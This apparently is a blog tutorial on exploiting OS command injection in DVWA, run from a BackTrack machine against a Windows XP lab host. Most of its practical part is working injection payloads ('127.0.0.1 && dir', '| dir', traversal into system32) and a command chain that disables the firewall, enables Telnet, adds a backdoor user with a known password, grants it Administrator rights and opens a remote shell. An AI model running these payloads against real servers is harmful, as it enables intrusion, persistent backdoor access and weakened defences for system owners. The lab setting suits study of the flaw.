Today i will be showing how to hack the website with the command execution vulnerability.
we will be see this on the DVWA
What is Command Execution ?
OS command injection is a technique used via a web interface in order to execute OS commands on a web server.
The user supplies operating system commands through a web interface in order to execute OS commands. Any web interface that is not properly sanitized is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords.
*** In the previous article i written how to access the dvwa from the backtrack that is installed in XP machine
Practical:
1.Take XP machine and the Backtrack Machine
2.Enter the ip of the XP machine and the dvwa
http://192.168.25.54/dvwa
the dvwa will open and go to command execution
3.The DVWA website asked to enter the IP to ping
so enter the 127.0.0.1(Your IP)
its pingging so its cool ..
4.Now try to execute the dir command ..
boom.......
got an error whats the problem ..
it only allows you to execute the ping command not any other then
how to bypass this
we can bypass this by using && or |(pipe) symbol
5. Now lets try this command
127.0.0.1 && dir ( or)
127.0.0.1 | dir ( or)
| dir
means just pipe and command
ok its executed, now try to find the ip of remote system
127.0.0.1 | ifconfig
Now if u want to find the files in the system32 directory then
127.0.0.1 && cd ../../../../../windows/system32 & dir
Now you can access what ever files you require from the system
What else we can do with Command Execution
Normally i am executing the command like this
| dir
but after this i want to take shell of the remote computer, we are having different ways i am showing one
1.so what i do is i disabled the firewall by executing the windows commands
To disable the windows XP firewall
netsh firewall set opmode disable
In your command execution type as "| netsh firewall set opmode disable" (without quotes)
To enable the windows XP firewall
netsh firewall set opmode enable
2. After that i want to start the service which is help ful for me, so i started the TELNET service by using the following commands
To start the TELNET service from command prompt
sc config tlntsvr start= auto (Hit Enter)
net start telnet
In your command execution type as "| sc config tlntsvr start= auto" (without quotes)
| net start telnet
3.so i want to access the remote PC with the help of Telnet but it will ask the login and password
so i added 1 user from cmd prompt only
To add new user from command prompt
net user /add user1 Ab12345
In your command execution type as "| net user /add user1 Ab12345" (without quotes)
4.Now i am the user but not having prievilages to access the telnet so thats why i added this user to the Administrators group for admin prievilages
net localgroup administrators user1 /add
In your command execution type as "| net localgroup administrators user1 /add" (without quotes)
5.I started a terminal in the backtrack and try to connect with the telnet
After that now i connected with the telnet
telnet 192.168.x.x
login:user1
password:Ab12345
Boooooooooooooooom...............
Got the shell of the remote computer
c:\>
Facebook
1 comment:
Good information provided on the types of injection in an easy to understand language and in very concise yet important. I am explorig on os command injection and will wait for more updation on that. thank you
Post a Comment